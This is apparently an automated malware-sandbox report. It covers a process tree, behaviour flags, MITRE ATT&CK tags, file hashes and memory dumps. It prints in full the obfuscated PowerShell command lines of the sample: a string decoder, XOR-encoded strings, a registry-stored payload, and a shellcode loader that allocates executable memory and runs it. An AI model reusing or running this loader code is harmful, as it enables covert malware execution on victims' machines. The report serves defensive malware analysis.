oCDu4sk0Gi3ExBAn3Fi5Mo2bo9Wh0BlEKo1Ve4St5Te3Be5Ko2Dk3ceDSc4RaCTo4Ov0Bu3AnBMi3Fo5gl2Ps9Up0ToEBe1Bo4Af5He3Af5At2To3MiDKi4Il9Sm4Ta0Co4Ro8To3ChBDe2De9No0CaEUn1No4Jo3Et0Co1Ha4Fi1Va2Es3HvDJe4Tu9Zo4Pl9Mi4Re9An'ef;BuddeeHemProPogpyrStaAgpNohPriticUnaLklAnlSiySe9Es ru`$SuAPapVarCoeAmyPrnSttNaeBo6Pa;Tm`$SvvUnaKarSe_LenDutG Ge=Su KofStkTupKo Za`$CadRaeArmNeoPugGarglamepVihShiPrcOvaPalSclDiySc5St Ha`$OpdBaeSamcroUngUprAnaBepSehMaibicAdaedlStlCoyTr6In;Ta`$CoABopChrPoeStyTvnMitPredi7un Hu=No BaHKoTHoBDu Ha'At4Hy4El2Mu3Sv0HaFpr0StDTj1ne0Su0StCAg0Re9Te0SkDCi0fe5ru0AuECr1Sa4Te5Po3la4Re0Ph5SeDSi4Ba0Ap4Bu4Re1St6Gr0Ab1So1no2Ty3ScFSh1Se6dm0or1Re4SmESk2Ka9Nb0AnESt1Sk6De0ChFFo0ErBCh0na5Br4Me8El3SuBPr2Re9Qu0ArERe1Ti4Af3ge0Su1Ov4Ko1Ke2To3AkDIn5nyAta5BuALi3PrASt0Su5Ta1Vi2Co0UnFKo4DrCKe4Bl0Ap5Ch3Fu5No5Ti5dd6Cl4StCCo4sa0Sk5Do0Ma1Af8Ag5Im3Em5Wi0Fo5Li0Dr5Un0Fo4TaCBu4Ch0Pu5An0An1Sn8Un5Ry4de5Ex0Di4Me9Ma'Af;FudDyeKamFooDegUdrFraSmpRehReiBecFuaOmlLalKoyFa9Mu Su`$UrADipFarSkeBeyBenYntGaeno7Ko;st`$KrAAgpForDeeNoyJunRitSyeGe8No Dr=An NyHNeTChBLo Fa'an4Si4be0NeFLa1Me2St0Ge9si4Le0In5PuDKr4ca0Sg4De4Ba1La6To0Le1Li1Pl2Wi3AmFMa1Vo6Un0Sl1Zi4ArEAa2Af9sm0UnEKn1Sp6St0NeFGl0CoBSk0Ha5Pe4Om8Cr3PtBAt2Br9Ap0BeEul1In4Bl3Il0Ba1Ao4Fl1Ox2Ka3VaDNo5DaACa5BrAdi3HjAUd0Sh5Dr1Re2Be0KvFNa4FrCFr4Ko0Sl5Ta0Ta1Aq8Re5Or1Re5Re0Rh5So0Un5Se0Re5ch0An5La0Al4SpCRa4Ba0Sc5In0Pl1Up8Mo5Ov3pl5Ur0Gy5Fo0Ne5Nv0Be4BuCHa4Gy0Ou5Ud0Be1Un8In5Be4Va4Hv9He'Ba;GndCheInmUuoUngBurReaFopSchAaiEucNoaBrlMulGeyDe9Ug Pr`$PrAInpFjrJeeOpyGanKatHueEt8Ti;be`$tvSHunSuaRaptasAneTetpaiFanElgAgeRetRosMo=Sh(ScGTreFotBu-SpIdetmeeLimBePLarRuoMapmieEkrketPrySy Sk-SpPSuaCrtGrhAl Ro'MiHTrKDoCInUFl:Ou\blNIdoSanPimReeTudAbiKacAsiVanalaArlBulBryDe\peKSkaActIniDrpTiuManSvaLanCu'No)Af.AfPDieCanBldEcuSulLosun;La`$FrAMipPrrSieEryAnnSutpreRu9Te ac=St paHReTBiBRe Ma'Av4Dj4Er2Si1Ov1to0Ni1Re2Me0Da5Vi1Si9Oc0StESt1Hy4Fe0mi5Lp4Be0Ps5PsDRi4Ov0Ba3ApBNo3Ou3Di1He9Co1Un3Re1Si4Cy0Ma5Fo0JiDGd4NeELa2Va3Mo0DaFSi0UnEOv1Pi6eb0Ka5Su1An2Ly1Mo4St3AfDIr5SwAKe5SaApe2Ge6Te1Te2Th0UnFSu0GeDEs2Ha2Fr0Ki1Ka1Dg3en0De5st5Tm6ba5su4Ga3Pr3Et1Re4te1Ta2Sc0To9Mi0SkEKl0Ad7Sn4Cr8Sk4Be4Rh3Lu3La0heETu0Ub1Fa1Bu0Wa1St3Id0Re5Wh1Le4sk0Rv9Ut0KaEEf0Au7Ba0Fl5Fi1Ta4No1Fa3Lo4Fa9Fd'Ia;MidFeeSpmInoRugOrrElaFrpHahAlicocDoaPhlGrlTryMa9mu No`$BoAKopLerUneAfyfnnTrtCheSa9De;Ge`$ThSepnMeaAfpUnsSeeomtGriPansugGleSitmlsIn0sk in=Eq SyHSkTUoBUg Tv'Un3MeBco3Aa3de1Su9Me1Sa3Re1Ny4Pr0Ge5Dy0BiDWa4AgEAn3Pa2Im1Li5Se0MoEAn1Fo4Pr0Fo9Ha0SnDLu0Gb5Ex4SeEKo2Br9Ta0frEDu1Wi4Ko0Ve5Le1Sk2Ot0EaFKo1un0Dy3Ke3Jo0Ca5Ba1In2Al1Au6Ca0Se9tm0Or3Re0In5Mi1In3No4OvEBo2RaDCl0Dy1St1Su2Mo1Dy3Im0En8Aa0Ch1Tr0LuCNa3MeDNy5TuAWa5NyADe2Mu3Fr0SkFGg1So0Re1No9Sm4Mi8Ov4St4Vi2Mo1gt1Ta0Kv1Pr2En0aa5Gy1Pa9Ra0NiESh1op4Sn0Ud5Fe4BlCMi4St0Be5De0Ba4PrCAr4Ka0Ob4Pa0Bg4Ve4Sp2Ud3Fi0PaFOu0CoDTi1So0Ri0BeCGe0br9Sj0LoDga0He5Hy0CoESk1Ch4Ge5Ma3Co4AnCUn4bu0Pr5Sk3Ex5Ph5At5Hy6Si4Di9Er'Mu;MadDeefomKkoStgpirPramapMihTaiKrcBoahilSnlStyTo9fr De`$AmSSvnDiaPapStsUdeOltcaiAhnBrgepeTvtAnsKa0Ud;Ma`$AbsfriTizMaeJa=Ur`$PrASvpDrrReeBeyDanGutCoeAn.hecDdoFeuRenRitSm-Si3Ne5Fo6Em;Ti`$KaSShnAnaafpMisMieSttBjiFgnTrgOdeHetOvsOl1Bu Tv=Um PrHPrTYsBPo Am'Mo3SyBSt3so3Ne1Ru9Mi1Qu3Ve1Kl4Em0Lo5St0ArDSp4BlESq3De2Ha1Et5Be0SkEEp1Kn4Tr0Dr9Is0TaDDe0Or5Di4SlEBr2Ti9Ab0BeESk1In4Pe0Ba5Be1Hi2Do0AuFMo1An0Ta3Mu3Ta0sk5St1Pl2Oi1En6Wo0Ra9Ko0Po3Un0Br5Ti1Am3Fl4LeERe2VlDIn0Em1Fi1Sa2Un1Sp3Mi0Ba8Br0Un1Sp0AdCSi3CeDVi5PrAOv5SaAEn2Un3Fd0HnFRu1ta0Va1Op9Sa4De8Rh4co4Se2Ba1Ov1Sh0Ca1Re2Fo0Te5Om1So9El0MeEBa1Fe4Pr0Ra5va4VeCCi4Vi0Sk5Uv3Kr5Mu5Fr5Co6Ma4MyCAm4Ps0No4Om4Tr0WiFvo1Ti2Pe0fr9Gu4SjCAn4Om0Od4Xi4sk1Mg3mi0Fe9Bo1PeAtr0Su5Lu4Ni9Fu'Mo;SkdLkeBdmDioMigPrrtraStpSuhTaiUdcTeaHilOvlJoyPi9Ke Or`$PaSBrnAnaEqpWasBreAvtPriBlnFigTaeMotRisSe1Sv;Ri`$QuSPlnCyaBrpTvsVieEstDiiFrnUngHeePttMosBi2Se Va=Av GaHBeTCoBLy Di'Po4Sa4Ek1Ro6Fa0Di1Ma1Vi2Bu3ReFCa1Lo2Li1De5Ph0BeESo0AkDba0Do5Un4Pr0Be5LaDGi4Un0Re3stBAn3Ge3Fi1Tv9Ln1Gi3In1Ov4Co0Mi5In0AiDMa4SaEKn3In2ro1Ld5St0HyERa1No4wo0So9un0JaDSo0Fl5Re4OmERe2Mo9En0NiEBr1Ti4Me0Fu5Pa1Be2Va0arFSt1So0Ta3In3In0Su5Bi1Fy2He1Ha6An0Ca9Ma0Ad3Bo0Go5an1Da3Pl4DrEFo2FlDCl0De1Fo1Fi2St1Od3Ci0To8Ro0Tr1La0AfCRe3NoDDa5ToABl5OuAFr2Be7Ex0Ho5Ru1St4Lo2Ch4Sp0br5Mi0GrCmo0Me5Li0Ve7Pe0So1Gr1Pa4Ke0pl5pr2No6Le0DiFKa1Si2Fo2St6my1Tr5Re0MiEMa0Sk3Op1Ks4ce0Bl9Me0QuFBo0deESn3Kv0fu0ScFRe0Pi9po0TaEUp1La4sa0Di5Gl1Sn2Gr4Mo8Re4No4Ls2ma3Bi0ImFSk0ChDAm1Ri0Lo0FoCEk0Da9Do0UnDFl0Er5wa0NoERe1Ts4Se5Mi3Na4LnCTo4Op0Ov4Tr8Mo2Ef7Mi2Ks4Fo3Or4St4in0Lo2Mi0Ma4Tr8Ce3BlBRa2Sn9Bu0AnESd1Ki4Ex3la0St1Ad4Ag1Tr2Tr3BiDMl4poCSu3KrBfa2Pu9ud0ukEHi1Fu4Po3Ju0Ca1Re4Bo1ac2Ps3RyDFl4Du9Ud4Ra0Ba4Us8Au3JaBSi3Me6Fo0MiFKr0Sk9Un0Br4Vi3TuDKl4ap9Ta4Ta9Ge4Ma9Fi'Tn;NodOweRemNooVegForBlaKopKahDuialcEkaSalEnlCoyUn9Sy Sa`$FoSFrnDoaCopScsUneSetNoiGanZegUnePatSosAg2Fo;Si`$PiSrenJuaenpSysEneBltSciTznsygAneSutResGa3Jo Mi=St KrHSuTFeBEl Sk'Co4Af4Me1Sn6Ha0No1Ep1St2Ca3ScFKe1Ln2sy1Il5At0AfEin0BeDen0St5Mo4ViEUd2Sy9Tu0AfEdi1Li6Sa0feFSe0GaBOs0Cl5Sk4Na8Sk4ri4St0HeFCa1Co2Ai0Gl9ua4FlCCe4Cr4Di1Mi6Di0In1Lw1Vi2Ta3hyFBl0FiEYa1Ta4In4On9An'Ti;BadAmeNomGloAlgSlrFaaLnpcohEciZocBeaVolArlOmycl9Se Ti`$VaSGenReaUrpFosUneEktPaiUnnHfgBeeTotFjsEx3Un#Be;""";;Function Snapsetingets9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Cal = $Cal + $HS.Substring($i, 1); } $Cal;}$Objektivismen0 = Snapsetingets9 'LuISeEcoXPr ';$Objektivismen1= Snapsetingets9 $Exorganic;if([Environment]::Is64BitProcess){ start-job { param($a) powershell $a } -RunAs32 -Argument $Objektivismen1 | wait-job | Receive-Job;}else{ & ($Objektivismen0) $Objektivismen1;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3976
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 96); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Fejlkontroller0=HTB '33191314050D4E040C0C';$Fejlkontroller1=HTB '2D0903120F130F06144E37090E53524E350E130106052E01140916052D0514080F0413';$Fejlkontroller2=HTB '27051430120F0321040412051313';$Fejlkontroller3=HTB '33191314050D4E32150E14090D054E290E1405120F1033051216090305134E28010E040C05320506';$Fejlkontroller4=HTB '131412090E07';$Fejlkontroller5=HTB '2705142D0F04150C0528010E040C05';$Fejlkontroller6=HTB '32343310050309010C2E010D054C402809040522193309074C403015020C0903';$Fejlkontroller7=HTB '32150E14090D054C402D010E01070504';$Fejlkontroller8=HTB '3205060C050314050424050C0507011405';$Fejlkontroller9=HTB '290E2D050D0F12192D0F04150C05';$demographically0=HTB '2D1924050C050701140534191005';$demographically1=HTB '230C0113134C403015020C09034C403305010C05044C40210E1309230C0113134C402115140F230C011313';$demographically2=HTB '290E160F0B05';$demographically3=HTB '3015020C09034C402809040522193309074C402E0517330C0F144C403609121415010C';$demographically4=HTB '3609121415010C210C0C0F03';$demographically5=HTB '0E14040C0C';$demographically6=HTB '2E1430120F140503143609121415010C2D050D0F1219';$demographically7=HTB '292538';$demographically8=HTB '3C';Set-Alias -name demographically9 -value $demographically7;function fkp {Param ($v_m, $v_p) ;$Apreynte0 =HTB '4416150E0D405D40483B211010240F0D01090E3D5A5A23151212050E14240F0D01090E4E270514211313050D020C0905134849401C4037080512054D2F020A050314401B40443F4E270C0F02010C211313050D020C192301030805404D210E0440443F4E2C0F030114090F0E4E33100C0914484404050D0F07120110080903010C0C1958493B4D513D4E251115010C13484426050A0C0B0F0E14120F0C0C05125049401D494E27051434191005484426050A0C0B0F0E14120F0C0C05125149';demographically9 $Apreynte0;$Apreynte5 = HTB '441601123F071001405D404416150E0D4E2705142D0514080F04484426050A0C0B0F0E14120F0C0C0512524C403B341910053B3D3D4020484426050A0C0B0F0E14120F0C0C0512534C404426050A0C0B0F0E14120F0C0C0512544949';demographically9 $Apreynte5;$Apreynte1 = HTB '12051415120E40441601123F0710014E290E160F0B0548440E150C0C4C4020483B33191314050D4E32150E14090D054E290E1405120F1033051216090305134E28010E040C053205063D482E05174D2F020A0503144033191314050D4E32150E14090D054E290E1405120F1033051216090305134E28010E040C0532050648482E05174D2F020A05031440290E14301412494C40484416150E0D4E2705142D0514080F04484426050A0C0B0F0E14120F0C0C05125549494E290E160F0B0548440E150C0C4C40204844163F0D494949494C4044163F104949';demographically9 $Apreynte1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Apreynte2 = HTB '44363422405D403B211010240F0D01090E3D5A5A23151212050E14240F0D01090E4E240506090E0524190E010D0903211313050D020C1948482E05174D2F020A0503144033191314050D4E3205060C050314090F0E4E211313050D020C192E010D05484426050A0C0B0F0E14120F0C0C05125849494C403B33191314050D4E3205060C050314090F0E4E250D09144E211313050D020C192215090C0405122103030513133D5A5A32150E494E240506090E0524190E010D09032D0F04150C05484426050A0C0B0F0E14120F0C0C0512594C404406010C1305494E240506090E0534191005484404050D0F07120110080903010C0C19504C404404050D0F07120110080903010C0C19514C403B33191314050D4E2D150C14090301131424050C05070114053D49';demographically9 $Apreynte2;$Apreynte3 = HTB '443634224E240506090E05230F0E1314121503140F12484426050A0C0B0F0E14120F0C0C0512564C403B33191314050D4E3205060C050314090F0E4E23010C0C090E07230F0E16050E14090F0E133D5A5A3314010E040112044C40441601123F100112010D0514051213494E330514290D100C050D050E140114090F0E260C010713484426050A0C0B0F0E14120F0C0C05125749';demographically9 $Apreynte3;$Apreynte4 = HTB '443634224E240506090E052D0514080F04484404050D0F07120110080903010C0C19524C404404050D0F07120110080903010C0C19534C40441612144C40441601123F100112010D0514051213494E330514290D100C050D050E140114090F0E260C010713484426050A0C0B0F0E14120F0C0C05125749';demographically9 $Apreynte4;$Apreynte5 = HTB '12051415120E40443634224E231205011405341910054849';demographically9 $Apreynte5 ;}$kk = HTB '0B05120E050C5352';$Apreynte6 = HTB '441601123F1601405D403B33191314050D4E32150E14090D054E290E1405120F1033051216090305134E2D01121308010C3D5A5A27051424050C0507011405260F1226150E0314090F0E300F090E1405124848060B1040440B0B404404050D0F07120110080903010C0C1954494C40482724344020483B290E143014123D4C403B35290E1453523D4C403B35290E1453523D4C403B35290E1453523D4940483B290E143014123D494949';demographically9 $Apreynte6;$var_nt = fkp $demographically5 $demographically6;$Apreynte7 = HTB '44230F0D100C090D050E1453405D40441601123F16014E290E160F0B05483B290E143014123D5A5A3A05120F4C405355564C405018535050504C405018545049';demographically9 $Apreynte7;$Apreynte8 = HTB '440F1209405D40441601123F16014E290E160F0B05483B290E143014123D5A5A3A05120F4C4050185150505050504C405018535050504C4050185449';demographically9 $Apreynte8;$Snapsetingets=(Get-ItemProperty -Path 'HKCU:\Nonmedicinally\Katipunan').Penduls;$Apreynte9 = HTB '4421101205190E1405405D403B33191314050D4E230F0E160512143D5A5A26120F0D220113055654331412090E074844330E0110130514090E0705141349';demographically9 $Apreynte9;$Snapsetingets0 = HTB '3B33191314050D4E32150E14090D054E290E1405120F1033051216090305134E2D01121308010C3D5A5A230F1019484421101205190E14054C40504C404044230F0D100C090D050E14534C4053555649';demographically9 $Snapsetingets0;$size=$Apreynte.count-356;$Snapsetingets1 = HTB '3B33191314050D4E32150E14090D054E290E1405120F1033051216090305134E2D01121308010C3D5A5A230F1019484421101205190E14054C405355564C40440F12094C404413091A0549';demographically9 $Snapsetingets1;$Snapsetingets2 = HTB '441601123F12150E0D05405D403B33191314050D4E32150E14090D054E290E1405120F1033051216090305134E2D01121308010C3D5A5A27051424050C0507011405260F1226150E0314090F0E300F090E1405124844230F0D100C090D050E14534C40482724344020483B290E143014123D4C3B290E143014123D4940483B360F09043D494949';demographically9 $Snapsetingets2;$Snapsetingets3 = HTB '441601123F12150E0D054E290E160F0B0548440F12094C441601123F0E1449';demographically9 $Snapsetingets3#"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3024

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
93678e82d776686aa54c42b8a98e6cbc

SHA1
802939dfed99ac74814c4371388b204c5810241d

SHA256
da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841

SHA512
0b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
8f6ba135b93d9aec2715f9dd33609ef8

SHA1
2c637ba90f75614bcf2652f7cbf28d7182dfcf12

SHA256
f5a806b46f790625eda038a100c1386bc6ca7fa8cd9b65cd45f15390c4b2e722

SHA512
c38d2eb16c97fd5fecee5b5b4562e0f8afbaa68a091b747807a8843df1d96a7f8456e9b04c5fc4232420a056673dd486b85617549583907199f184bb160f4cad

Download Submit
memory/3024-154-0x00000000073D0000-0x00000000074D0000-memory.dmp

Filesize
1024KB

Download
memory/3024-152-0x00000000073D0000-0x00000000074D0000-memory.dmp

Filesize
1024KB

Download
memory/3024-151-0x0000000008790000-0x0000000008D34000-memory.dmp

Filesize
5.6MB

Download
memory/3024-150-0x0000000007510000-0x0000000007532000-memory.dmp

Filesize
136KB

Download
memory/3024-149-0x0000000007580000-0x0000000007616000-memory.dmp

Filesize
600KB

Download
memory/3024-147-0x0000000007B60000-0x00000000081DA000-memory.dmp

Filesize
6.5MB

Download
memory/3976-137-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

Filesize
10.8MB

Download
memory/3976-133-0x0000026137AD0000-0x0000026137AF2000-memory.dmp

Filesize
136KB

Download
memory/3976-134-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

Filesize
10.8MB

Download
memory/3976-135-0x0000026153020000-0x0000026153196000-memory.dmp

Filesize
1.5MB

Download
memory/3976-136-0x00000261533B0000-0x00000261535BA000-memory.dmp

Filesize
2.0MB

Download
memory/4204-141-0x0000000004E30000-0x0000000004E52000-memory.dmp

Filesize
136KB

Download
memory/4204-148-0x0000000006570000-0x000000000658A000-memory.dmp

Filesize
104KB

Download
memory/4204-139-0x00000000048D0000-0x0000000004906000-memory.dmp

Filesize
216KB

Download
memory/4204-140-0x0000000005080000-0x00000000056A8000-memory.dmp

Filesize
6.2MB

Download
memory/4204-142-0x0000000005860000-0x00000000058C6000-memory.dmp

Filesize
408KB

Download
memory/4204-144-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

Filesize
120KB

Download
memory/4204-143-0x00000000058D0000-0x0000000005936000-memory.dmp

Filesize
408KB

Download

Analysis

Sharing